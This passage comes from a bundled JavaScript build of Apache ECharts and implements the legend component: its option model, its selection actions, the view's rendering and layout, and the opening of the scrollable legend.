OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar langSelector = lang.legend.selector;\n\nvar defaultSelectorOption = {\n    all: {\n        type: 'all',\n        title: clone(langSelector.all)\n    },\n    inverse: {\n        type: 'inverse',\n        title: clone(langSelector.inverse)\n    }\n};\n\nvar LegendModel = extendComponentModel({\n\n    type: 'legend.plain',\n\n    dependencies: ['series'],\n\n    layoutMode: {\n        type: 'box',\n        // legend.width/height are maxWidth/maxHeight actually,\n        // whereas realy width/height is calculated by its content.\n        // (Setting {left: 10, right: 10} does not make sense).\n        // So consider the case:\n        // `setOption({legend: {left: 10});`\n        // then `setOption({legend: {right: 10});`\n        // The previous `left` should be cleared by setting `ignoreSize`.\n        ignoreSize: true\n    },\n\n    init: function (option, parentModel, ecModel) {\n        this.mergeDefaultAndTheme(option, ecModel);\n\n        option.selected = option.selected || {};\n        this._updateSelector(option);\n    },\n\n    mergeOption: function (option) {\n        LegendModel.superCall(this, 'mergeOption', option);\n        this._updateSelector(option);\n    },\n\n    _updateSelector: function (option) {\n        var selector = option.selector;\n        if (selector === true) {\n            selector = option.selector = ['all', 'inverse'];\n        }\n        if (isArray(selector)) {\n            each$1(selector, function (item, index) {\n                isString(item) && (item = {type: item});\n                selector[index] = merge(item, defaultSelectorOption[item.type]);\n            });\n        }\n    },\n\n    optionUpdated: function () {\n        this._updateData(this.ecModel);\n\n        var legendData = this._data;\n\n        // If selectedMode is single, try to select one\n        if (legendData[0] && this.get('selectedMode') === 'single') {\n            var hasSelected = false;\n            // If has any selected in option.selected\n            for (var i = 0; i < legendData.length; i++) {\n                var name = legendData[i].get('name');\n                if (this.isSelected(name)) {\n                    // Force to unselect others\n                    this.select(name);\n                    hasSelected = true;\n                    break;\n                }\n            }\n            // Try select the first if selectedMode is single\n            !hasSelected && this.select(legendData[0].get('name'));\n        }\n    },\n\n    _updateData: function (ecModel) {\n        var potentialData = [];\n        var availableNames = [];\n\n        ecModel.eachRawSeries(function (seriesModel) {\n            var seriesName = seriesModel.name;\n            availableNames.push(seriesName);\n            var isPotential;\n\n            if (seriesModel.legendVisualProvider) {\n                var provider = seriesModel.legendVisualProvider;\n                var names = provider.getAllNames();\n\n                if (!ecModel.isSeriesFiltered(seriesModel)) {\n                    availableNames = availableNames.concat(names);\n                }\n\n                if (names.length) {\n                    potentialData = potentialData.concat(names);\n                }\n                else {\n                    isPotential = true;\n                }\n            }\n            else {\n                isPotential = true;\n            }\n\n            if (isPotential && isNameSpecified(seriesModel)) {\n                potentialData.push(seriesModel.name);\n            }\n        });\n\n        /**\n         * @type {Array.<string>}\n         * @private\n         */\n        this._availableNames = availableNames;\n\n        // If legend.data not specified in option, use availableNames as data,\n        // which is convinient for user preparing option.\n        var rawData = this.get('data') || potentialData;\n\n        var legendData = map(rawData, function (dataItem) {\n            // Can be string or number\n            if (typeof dataItem === 'string' || typeof dataItem === 'number') {\n                dataItem = {\n                    name: dataItem\n                };\n            }\n            return new Model(dataItem, this, this.ecModel);\n        }, this);\n\n        /**\n         * @type {Array.<module:echarts/model/Model>}\n         * @private\n         */\n        this._data = legendData;\n    },\n\n    /**\n     * @return {Array.<module:echarts/model/Model>}\n     */\n    getData: function () {\n        return this._data;\n    },\n\n    /**\n     * @param {string} name\n     */\n    select: function (name) {\n        var selected = this.option.selected;\n        var selectedMode = this.get('selectedMode');\n        if (selectedMode === 'single') {\n            var data = this._data;\n            each$1(data, function (dataItem) {\n                selected[dataItem.get('name')] = false;\n            });\n        }\n        selected[name] = true;\n    },\n\n    /**\n     * @param {string} name\n     */\n    unSelect: function (name) {\n        if (this.get('selectedMode') !== 'single') {\n            this.option.selected[name] = false;\n        }\n    },\n\n    /**\n     * @param {string} name\n     */\n    toggleSelected: function (name) {\n        var selected = this.option.selected;\n        // Default is true\n        if (!selected.hasOwnProperty(name)) {\n            selected[name] = true;\n        }\n        this[selected[name] ? 'unSelect' : 'select'](name);\n    },\n\n    allSelect: function () {\n        var data = this._data;\n        var selected = this.option.selected;\n        each$1(data, function (dataItem) {\n            selected[dataItem.get('name', true)] = true;\n        });\n    },\n\n    inverseSelect: function () {\n        var data = this._data;\n        var selected = this.option.selected;\n        each$1(data, function (dataItem) {\n            var name = dataItem.get('name', true);\n            // Initially, default value is true\n            if (!selected.hasOwnProperty(name)) {\n                selected[name] = true;\n            }\n            selected[name] = !selected[name];\n        });\n    },\n\n    /**\n     * @param {string} name\n     */\n    isSelected: function (name) {\n        var selected = this.option.selected;\n        return !(selected.hasOwnProperty(name) && !selected[name])\n            && indexOf(this._availableNames, name) >= 0;\n    },\n\n    getOrient: function () {\n        return this.get('orient') === 'vertical'\n            ? {index: 1, name: 'vertical'}\n            : {index: 0, name: 'horizontal'};\n    },\n\n    defaultOption: {\n        // 一级层叠\n        zlevel: 0,\n        // 二级层叠\n        z: 4,\n        show: true,\n\n        // 布局方式，默认为水平布局，可选为：\n        // 'horizontal' | 'vertical'\n        orient: 'horizontal',\n\n        left: 'center',\n        // right: 'center',\n\n        top: 0,\n        // bottom: null,\n\n        // 水平对齐\n        // 'auto' | 'left' | 'right'\n        // 默认为 'auto', 根据 x 的位置判断是左对齐还是右对齐\n        align: 'auto',\n\n        backgroundColor: 'rgba(0,0,0,0)',\n        // 图例边框颜色\n        borderColor: '#ccc',\n        borderRadius: 0,\n        // 图例边框线宽，单位px，默认为0（无边框）\n        borderWidth: 0,\n        // 图例内边距，单位px，默认各方向内边距为5，\n        // 接受数组分别设定上右下左边距，同css\n        padding: 5,\n        // 各个item之间的间隔，单位px，默认为10，\n        // 横向布局时为水平间隔，纵向布局时为纵向间隔\n        itemGap: 10,\n        // the width of legend symbol\n        itemWidth: 25,\n        // the height of legend symbol\n        itemHeight: 14,\n\n        // the color of unselected legend symbol\n        inactiveColor: '#ccc',\n\n        // the borderColor of unselected legend symbol\n        inactiveBorderColor: '#ccc',\n\n        itemStyle: {\n            // the default borderWidth of legend symbol\n            borderWidth: 0\n        },\n\n        textStyle: {\n            // 图例文字颜色\n            color: '#333'\n        },\n        // formatter: '',\n        // 选择模式，默认开启图例开关\n        selectedMode: true,\n        // 配置默认选中状态，可配合LEGEND.SELECTED事件做动态数据载入\n        // selected: null,\n        // 图例内容（详见legend.data，数组中每一项代表一个item\n        // data: [],\n\n        // Usage:\n        // selector: [{type: 'all or inverse', title: xxx}]\n        // or\n        // selector: true\n        // or\n        // selector: ['all', 'inverse']\n        selector: false,\n\n        selectorLabel: {\n            show: true,\n            borderRadius: 10,\n            padding: [3, 5, 3, 5],\n            fontSize: 12,\n            fontFamily: ' sans-serif',\n            color: '#666',\n            borderWidth: 1,\n            borderColor: '#666'\n        },\n\n        emphasis: {\n            selectorLabel: {\n                show: true,\n                color: '#eee',\n                backgroundColor: '#666'\n            }\n        },\n\n        // Value can be 'start' or 'end'\n        selectorPosition: 'auto',\n\n        selectorItemGap: 7,\n\n        selectorButtonGap: 10,\n\n        // Tooltip 相关配置\n        tooltip: {\n            show: false\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction legendSelectActionHandler(methodName, payload, ecModel) {\n    var selectedMap = {};\n    var isToggleSelect = methodName === 'toggleSelected';\n    var isSelected;\n    // Update all legend components\n    ecModel.eachComponent('legend', function (legendModel) {\n        if (isToggleSelect && isSelected != null) {\n            // Force other legend has same selected status\n            // Or the first is toggled to true and other are toggled to false\n            // In the case one legend has some item unSelected in option. And if other legend\n            // doesn't has the item, they will assume it is selected.\n            legendModel[isSelected ? 'select' : 'unSelect'](payload.name);\n        }\n        else if (methodName === 'allSelect' || methodName === 'inverseSelect') {\n            legendModel[methodName]();\n        }\n        else {\n            legendModel[methodName](payload.name);\n            isSelected = legendModel.isSelected(payload.name);\n        }\n        var legendData = legendModel.getData();\n        each$1(legendData, function (model) {\n            var name = model.get('name');\n            // Wrap element\n            if (name === '\\n' || name === '') {\n                return;\n            }\n            var isItemSelected = legendModel.isSelected(name);\n            if (selectedMap.hasOwnProperty(name)) {\n                // Unselected if any legend is unselected\n                selectedMap[name] = selectedMap[name] && isItemSelected;\n            }\n            else {\n                selectedMap[name] = isItemSelected;\n            }\n        });\n    });\n    // Return the event explicitly\n    return (methodName === 'allSelect' || methodName === 'inverseSelect')\n        ? {\n            selected: selectedMap\n        }\n        : {\n            name: payload.name,\n            selected: selectedMap\n        };\n}\n/**\n * @event legendToggleSelect\n * @type {Object}\n * @property {string} type 'legendToggleSelect'\n * @property {string} [from]\n * @property {string} name Series name or data item name\n */\nregisterAction(\n    'legendToggleSelect', 'legendselectchanged',\n    curry(legendSelectActionHandler, 'toggleSelected')\n);\n\nregisterAction(\n    'legendAllSelect', 'legendselectall',\n    curry(legendSelectActionHandler, 'allSelect')\n);\n\nregisterAction(\n    'legendInverseSelect', 'legendinverseselect',\n    curry(legendSelectActionHandler, 'inverseSelect')\n);\n\n/**\n * @event legendSelect\n * @type {Object}\n * @property {string} type 'legendSelect'\n * @property {string} name Series name or data item name\n */\nregisterAction(\n    'legendSelect', 'legendselected',\n    curry(legendSelectActionHandler, 'select')\n);\n\n/**\n * @event legendUnSelect\n * @type {Object}\n * @property {string} type 'legendUnSelect'\n * @property {string} name Series name or data item name\n */\nregisterAction(\n    'legendUnSelect', 'legendunselected',\n    curry(legendSelectActionHandler, 'unSelect')\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar curry$6 = curry;\nvar each$25 = each$1;\nvar Group$3 = Group;\n\nvar LegendView = extendComponentView({\n\n    type: 'legend.plain',\n\n    newlineDisabled: false,\n\n    /**\n     * @override\n     */\n    init: function () {\n\n        /**\n         * @private\n         * @type {module:zrender/container/Group}\n         */\n        this.group.add(this._contentGroup = new Group$3());\n\n        /**\n         * @private\n         * @type {module:zrender/Element}\n         */\n        this._backgroundEl;\n\n        /**\n         * @private\n         * @type {module:zrender/container/Group}\n         */\n        this.group.add(this._selectorGroup = new Group$3());\n\n        /**\n         * If first rendering, `contentGroup.position` is [0, 0], which\n         * does not make sense and may cause unexepcted animation if adopted.\n         * @private\n         * @type {boolean}\n         */\n        this._isFirstRender = true;\n    },\n\n    /**\n     * @protected\n     */\n    getContentGroup: function () {\n        return this._contentGroup;\n    },\n\n    /**\n     * @protected\n     */\n    getSelectorGroup: function () {\n        return this._selectorGroup;\n    },\n\n    /**\n     * @override\n     */\n    render: function (legendModel, ecModel, api) {\n        var isFirstRender = this._isFirstRender;\n        this._isFirstRender = false;\n\n        this.resetInner();\n\n        if (!legendModel.get('show', true)) {\n            return;\n        }\n\n        var itemAlign = legendModel.get('align');\n        var orient = legendModel.get('orient');\n        if (!itemAlign || itemAlign === 'auto') {\n            itemAlign = (\n                legendModel.get('left') === 'right'\n                && orient === 'vertical'\n            ) ? 'right' : 'left';\n        }\n\n        var selector = legendModel.get('selector', true);\n        var selectorPosition = legendModel.get('selectorPosition', true);\n        if (selector && (!selectorPosition || selectorPosition === 'auto')) {\n            selectorPosition = orient === 'horizontal' ? 'end' : 'start';\n        }\n\n        this.renderInner(itemAlign, legendModel, ecModel, api, selector, orient, selectorPosition);\n\n        // Perform layout.\n        var positionInfo = legendModel.getBoxLayoutParams();\n        var viewportSize = {width: api.getWidth(), height: api.getHeight()};\n        var padding = legendModel.get('padding');\n\n        var maxSize = getLayoutRect(positionInfo, viewportSize, padding);\n\n        var mainRect = this.layoutInner(legendModel, itemAlign, maxSize, isFirstRender, selector, selectorPosition);\n\n        // Place mainGroup, based on the calculated `mainRect`.\n        var layoutRect = getLayoutRect(\n            defaults({width: mainRect.width, height: mainRect.height}, positionInfo),\n            viewportSize,\n            padding\n        );\n        this.group.attr('position', [layoutRect.x - mainRect.x, layoutRect.y - mainRect.y]);\n\n        // Render background after group is layout.\n        this.group.add(\n            this._backgroundEl = makeBackground(mainRect, legendModel)\n        );\n    },\n\n    /**\n     * @protected\n     */\n    resetInner: function () {\n        this.getContentGroup().removeAll();\n        this._backgroundEl && this.group.remove(this._backgroundEl);\n        this.getSelectorGroup().removeAll();\n    },\n\n    /**\n     * @protected\n     */\n    renderInner: function (itemAlign, legendModel, ecModel, api, selector, orient, selectorPosition) {\n        var contentGroup = this.getContentGroup();\n        var legendDrawnMap = createHashMap();\n        var selectMode = legendModel.get('selectedMode');\n\n        var excludeSeriesId = [];\n        ecModel.eachRawSeries(function (seriesModel) {\n            !seriesModel.get('legendHoverLink') && excludeSeriesId.push(seriesModel.id);\n        });\n\n        each$25(legendModel.getData(), function (itemModel, dataIndex) {\n            var name = itemModel.get('name');\n\n            // Use empty string or \\n as a newline string\n            if (!this.newlineDisabled && (name === '' || name === '\\n')) {\n                contentGroup.add(new Group$3({\n                    newline: true\n                }));\n                return;\n            }\n\n            // Representitive series.\n            var seriesModel = ecModel.getSeriesByName(name)[0];\n\n            if (legendDrawnMap.get(name)) {\n                // Have been drawed\n                return;\n            }\n\n            // Legend to control series.\n            if (seriesModel) {\n                var data = seriesModel.getData();\n                var color = data.getVisual('color');\n                var borderColor = data.getVisual('borderColor');\n\n                // If color is a callback function\n                if (typeof color === 'function') {\n                    // Use the first data\n                    color = color(seriesModel.getDataParams(0));\n                }\n\n                 // If borderColor is a callback function\n                if (typeof borderColor === 'function') {\n                    // Use the first data\n                    borderColor = borderColor(seriesModel.getDataParams(0));\n                }\n\n                // Using rect symbol defaultly\n                var legendSymbolType = data.getVisual('legendSymbol') || 'roundRect';\n                var symbolType = data.getVisual('symbol');\n\n                var itemGroup = this._createItem(\n                    name, dataIndex, itemModel, legendModel,\n                    legendSymbolType, symbolType,\n                    itemAlign, color, borderColor,\n                    selectMode\n                );\n\n                itemGroup.on('click', curry$6(dispatchSelectAction, name, null, api, excludeSeriesId))\n                    .on('mouseover', curry$6(dispatchHighlightAction, seriesModel.name, null, api, excludeSeriesId))\n                    .on('mouseout', curry$6(dispatchDownplayAction, seriesModel.name, null, api, excludeSeriesId));\n\n                legendDrawnMap.set(name, true);\n            }\n            else {\n                // Legend to control data. In pie and funnel.\n                ecModel.eachRawSeries(function (seriesModel) {\n\n                    // In case multiple series has same data name\n                    if (legendDrawnMap.get(name)) {\n                        return;\n                    }\n\n                    if (seriesModel.legendVisualProvider) {\n                        var provider = seriesModel.legendVisualProvider;\n                        if (!provider.containName(name)) {\n                            return;\n                        }\n\n                        var idx = provider.indexOfName(name);\n\n                        var color = provider.getItemVisual(idx, 'color');\n                        var borderColor = provider.getItemVisual(idx, 'borderColor');\n\n                        var legendSymbolType = 'roundRect';\n\n                        var itemGroup = this._createItem(\n                            name, dataIndex, itemModel, legendModel,\n                            legendSymbolType, null,\n                            itemAlign, color, borderColor,\n                            selectMode\n                        );\n\n                        // FIXME: consider different series has items with the same name.\n                        itemGroup.on('click', curry$6(dispatchSelectAction, null, name, api, excludeSeriesId))\n                            // Should not specify the series name, consider legend controls\n                            // more than one pie series.\n                            .on('mouseover', curry$6(dispatchHighlightAction, null, name, api, excludeSeriesId))\n                            .on('mouseout', curry$6(dispatchDownplayAction, null, name, api, excludeSeriesId));\n\n                        legendDrawnMap.set(name, true);\n                    }\n\n                }, this);\n            }\n\n            if (__DEV__) {\n                if (!legendDrawnMap.get(name)) {\n                    console.warn(\n                        name + ' series not exists. Legend data should be same with series name or data name.'\n                    );\n                }\n            }\n        }, this);\n\n        if (selector) {\n            this._createSelector(selector, legendModel, api, orient, selectorPosition);\n        }\n    },\n\n    _createSelector: function (selector, legendModel, api, orient, selectorPosition) {\n        var selectorGroup = this.getSelectorGroup();\n\n        each$25(selector, function (selectorItem) {\n            createSelectorButton(selectorItem);\n        });\n\n        function createSelectorButton(selectorItem) {\n            var type = selectorItem.type;\n\n            var labelText = new Text({\n                style: {\n                    x: 0,\n                    y: 0,\n                    align: 'center',\n                    verticalAlign: 'middle'\n                },\n                onclick: function () {\n                    api.dispatchAction({\n                        type: type === 'all' ? 'legendAllSelect' : 'legendInverseSelect'\n                    });\n                }\n            });\n\n            selectorGroup.add(labelText);\n\n            var labelModel = legendModel.getModel('selectorLabel');\n            var emphasisLabelModel = legendModel.getModel('emphasis.selectorLabel');\n\n            setLabelStyle(\n                labelText.style, labelText.hoverStyle = {}, labelModel, emphasisLabelModel,\n                {\n                    defaultText: selectorItem.title,\n                    isRectText: false\n                }\n            );\n            setHoverStyle(labelText);\n        }\n    },\n\n    _createItem: function (\n        name, dataIndex, itemModel, legendModel,\n        legendSymbolType, symbolType,\n        itemAlign, color, borderColor, selectMode\n    ) {\n        var itemWidth = legendModel.get('itemWidth');\n        var itemHeight = legendModel.get('itemHeight');\n        var inactiveColor = legendModel.get('inactiveColor');\n        var inactiveBorderColor = legendModel.get('inactiveBorderColor');\n        var symbolKeepAspect = legendModel.get('symbolKeepAspect');\n        var legendModelItemStyle = legendModel.getModel('itemStyle');\n\n        var isSelected = legendModel.isSelected(name);\n        var itemGroup = new Group$3();\n\n        var textStyleModel = itemModel.getModel('textStyle');\n\n        var itemIcon = itemModel.get('icon');\n\n        var tooltipModel = itemModel.getModel('tooltip');\n        var legendGlobalTooltipModel = tooltipModel.parentModel;\n\n        // Use user given icon first\n        legendSymbolType = itemIcon || legendSymbolType;\n        var legendSymbol = createSymbol(\n            legendSymbolType,\n            0,\n            0,\n            itemWidth,\n            itemHeight,\n            isSelected ? color : inactiveColor,\n            // symbolKeepAspect default true for legend\n            symbolKeepAspect == null ? true : symbolKeepAspect\n        );\n        itemGroup.add(\n            setSymbolStyle(\n                legendSymbol, legendSymbolType, legendModelItemStyle,\n                borderColor, inactiveBorderColor, isSelected\n            )\n        );\n\n        // Compose symbols\n        // PENDING\n        if (!itemIcon && symbolType\n            // At least show one symbol, can't be all none\n            && ((symbolType !== legendSymbolType) || symbolType === 'none')\n        ) {\n            var size = itemHeight * 0.8;\n            if (symbolType === 'none') {\n                symbolType = 'circle';\n            }\n            var legendSymbolCenter = createSymbol(\n                symbolType,\n                (itemWidth - size) / 2,\n                (itemHeight - size) / 2,\n                size,\n                size,\n                isSelected ? color : inactiveColor,\n                // symbolKeepAspect default true for legend\n                symbolKeepAspect == null ? true : symbolKeepAspect\n            );\n            // Put symbol in the center\n            itemGroup.add(\n                setSymbolStyle(\n                    legendSymbolCenter, symbolType, legendModelItemStyle,\n                    borderColor, inactiveBorderColor, isSelected\n                )\n            );\n        }\n\n        var textX = itemAlign === 'left' ? itemWidth + 5 : -5;\n        var textAlign = itemAlign;\n\n        var formatter = legendModel.get('formatter');\n        var content = name;\n        if (typeof formatter === 'string' && formatter) {\n            content = formatter.replace('{name}', name != null ? name : '');\n        }\n        else if (typeof formatter === 'function') {\n            content = formatter(name);\n        }\n\n        itemGroup.add(new Text({\n            style: setTextStyle({}, textStyleModel, {\n                text: content,\n                x: textX,\n                y: itemHeight / 2,\n                textFill: isSelected ? textStyleModel.getTextColor() : inactiveColor,\n                textAlign: textAlign,\n                textVerticalAlign: 'middle'\n            })\n        }));\n\n        // Add a invisible rect to increase the area of mouse hover\n        var hitRect = new Rect({\n            shape: itemGroup.getBoundingRect(),\n            invisible: true,\n            tooltip: tooltipModel.get('show') ? extend({\n                content: name,\n                // Defaul formatter\n                formatter: legendGlobalTooltipModel.get('formatter', true) || function () {\n                    return name;\n                },\n                formatterParams: {\n                    componentType: 'legend',\n                    legendIndex: legendModel.componentIndex,\n                    name: name,\n                    $vars: ['name']\n                }\n            }, tooltipModel.option) : null\n        });\n        itemGroup.add(hitRect);\n\n        itemGroup.eachChild(function (child) {\n            child.silent = true;\n        });\n\n        hitRect.silent = !selectMode;\n\n        this.getContentGroup().add(itemGroup);\n\n        setHoverStyle(itemGroup);\n\n        itemGroup.__legendDataIndex = dataIndex;\n\n        return itemGroup;\n    },\n\n    /**\n     * @protected\n     */\n    layoutInner: function (legendModel, itemAlign, maxSize, isFirstRender, selector, selectorPosition) {\n        var contentGroup = this.getContentGroup();\n        var selectorGroup = this.getSelectorGroup();\n\n        // Place items in contentGroup.\n        box(\n            legendModel.get('orient'),\n            contentGroup,\n            legendModel.get('itemGap'),\n            maxSize.width,\n            maxSize.height\n        );\n\n        var contentRect = contentGroup.getBoundingRect();\n        var contentPos = [-contentRect.x, -contentRect.y];\n\n        if (selector) {\n            // Place buttons in selectorGroup\n            box(\n                // Buttons in selectorGroup always layout horizontally\n                'horizontal',\n                selectorGroup,\n                legendModel.get('selectorItemGap', true)\n            );\n\n            var selectorRect = selectorGroup.getBoundingRect();\n            var selectorPos = [-selectorRect.x, -selectorRect.y];\n            var selectorButtonGap = legendModel.get('selectorButtonGap', true);\n\n            var orientIdx = legendModel.getOrient().index;\n            var wh = orientIdx === 0 ? 'width' : 'height';\n            var hw = orientIdx === 0 ? 'height' : 'width';\n            var yx = orientIdx === 0 ? 'y' : 'x';\n\n            if (selectorPosition === 'end') {\n                selectorPos[orientIdx] += contentRect[wh] + selectorButtonGap;\n            }\n            else {\n                contentPos[orientIdx] += selectorRect[wh] + selectorButtonGap;\n            }\n\n            //Always align selector to content as 'middle'\n            selectorPos[1 - orientIdx] += contentRect[hw] / 2 - selectorRect[hw] / 2;\n            selectorGroup.attr('position', selectorPos);\n            contentGroup.attr('position', contentPos);\n\n            var mainRect = {x: 0, y: 0};\n            mainRect[wh] = contentRect[wh] + selectorButtonGap + selectorRect[wh];\n            mainRect[hw] = Math.max(contentRect[hw], selectorRect[hw]);\n            mainRect[yx] = Math.min(0, selectorRect[yx] + selectorPos[1 - orientIdx]);\n            return mainRect;\n        }\n        else {\n            contentGroup.attr('position', contentPos);\n            return this.group.getBoundingRect();\n        }\n    },\n\n    /**\n     * @protected\n     */\n    remove: function () {\n        this.getContentGroup().removeAll();\n        this._isFirstRender = true;\n    }\n\n});\n\nfunction setSymbolStyle(symbol, symbolType, legendModelItemStyle, borderColor, inactiveBorderColor, isSelected) {\n    var itemStyle;\n    if (symbolType !== 'line' && symbolType.indexOf('empty') < 0) {\n        itemStyle = legendModelItemStyle.getItemStyle();\n        symbol.style.stroke = borderColor;\n        if (!isSelected) {\n            itemStyle.stroke = inactiveBorderColor;\n        }\n    }\n    else {\n        itemStyle = legendModelItemStyle.getItemStyle(['borderWidth', 'borderColor']);\n    }\n    return symbol.setStyle(itemStyle);\n}\n\nfunction dispatchSelectAction(seriesName, dataName, api, excludeSeriesId) {\n    // downplay before unselect\n    dispatchDownplayAction(seriesName, dataName, api, excludeSeriesId);\n    api.dispatchAction({\n        type: 'legendToggleSelect',\n        name: seriesName != null ? seriesName : dataName\n    });\n    // highlight after select\n    dispatchHighlightAction(seriesName, dataName, api, excludeSeriesId);\n}\n\nfunction dispatchHighlightAction(seriesName, dataName, api, excludeSeriesId) {\n    // If element hover will move to a hoverLayer.\n    var el = api.getZr().storage.getDisplayList()[0];\n    if (!(el && el.useHoverLayer)) {\n        api.dispatchAction({\n            type: 'highlight',\n            seriesName: seriesName,\n            name: dataName,\n            excludeSeriesId: excludeSeriesId\n        });\n    }\n}\n\nfunction dispatchDownplayAction(seriesName, dataName, api, excludeSeriesId) {\n    // If element hover will move to a hoverLayer.\n    var el = api.getZr().storage.getDisplayList()[0];\n    if (!(el && el.useHoverLayer)) {\n        api.dispatchAction({\n            type: 'downplay',\n            seriesName: seriesName,\n            name: dataName,\n            excludeSeriesId: excludeSeriesId\n        });\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar legendFilter = function (ecModel) {\n\n    var legendModels = ecModel.findComponents({\n        mainType: 'legend'\n    });\n    if (legendModels && legendModels.length) {\n        ecModel.filterSeries(function (series) {\n            // If in any legend component the status is not selected.\n            // Because in legend series is assumed selected when it is not in the legend data.\n            for (var i = 0; i < legendModels.length; i++) {\n                if (!legendModels[i].isSelected(series.name)) {\n                    return false;\n                }\n            }\n            return true;\n        });\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n// Do not contain scrollable legend, for sake of file size.\n\n// Series Filter\nregisterProcessor(PRIORITY.PROCESSOR.SERIES_FILTER, legendFilter);\n\nComponentModel.registerSubTypeDefaulter('legend', function () {\n    // Default 'plain' when no type specified.\n    return 'plain';\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar ScrollableLegendModel = LegendModel.extend({\n\n    type: 'legend.scroll',\n\n    /**\n     * @param {number} scrollDataIndex\n     */\n    setScrollDataIndex: function (scrollDataIndex) {\n        this.option.scrollDataIndex = scrollDataIndex;\n    },\n\n    defaultOption: {\n        scrollDataIndex: 0,\n        pageButtonItemGap: 5,\n        pageButtonGap: null,\n        pageButtonPosition: 'end', // 'start' or 'end'\n        pageFormatter: '{current}/{total}', // If null/undefined, do not show page.\n        pageIcons: {\n            horizontal: ['M0,0L12,-10L12,10z', 'M0,0L-12,-10L-12,10z'],\n            vertical: ['M0,0L20,0L10,-20z', 'M0,0L20,0L10,20z']\n        },\n        pageIconColor: '#2f4554',\n        pageIconInactiveColor: '#aaa',\n        pageIconSize: 15, // Can be [10, 3], which represents [width, height]\n        pageTextStyle: {\n            color: '#333'\n        },\n\n        animationDurationUpdate: 800\n    },\n\n    /**\n     * @override\n     */\n    init: function (option, parentModel, ecModel, extraOpt) {\n        var inputPositionParams = getLayoutParams(option);\n\n        ScrollableLegendModel.superCall(this, 'init', option, parentModel, ecModel, extraOpt);\n\n        mergeAndNormalizeLayoutParams$1(this, option, inputPositionParams);\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function (option, extraOpt) {\n        ScrollableLegendModel.superCall(this, 'mergeOption', option, extraOpt);\n\n        mergeAndNormalizeLayoutParams$1(this, this.option, option);\n    }\n\n});\n\n// Do not `ignoreSize` to enable setting {left: 10, right: 10}.\nfunction mergeAndNormalizeLayoutParams$1(legendModel, target, raw) {\n    var orient = legendModel.getOrient();\n    var ignoreSize = [1, 1];\n    ignoreSize[orient.index] = 0;\n    mergeLayoutParam(target, raw, {\n        type: 'box', ignoreSize: ignoreSize\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Separate legend and scrollable legend to reduce package size.\n */\n\nvar Group$4 = Group;\n\nvar WH$1 = ['width', 'height'];\nvar XY$1 = ['x', 'y'];\n\nvar ScrollableLegendView = LegendView.extend({\n\n    type: 'legend.scroll',\n\n    newlineDisabled: true,\n\n    init: function () {\n\n        ScrollableLegendView.superCall(this, 'init');\n\n        /**\n         * @private\n         * @type {number} For `scroll`.\n         */\n        this._currentIndex = 0;\n\n        /**\n         * 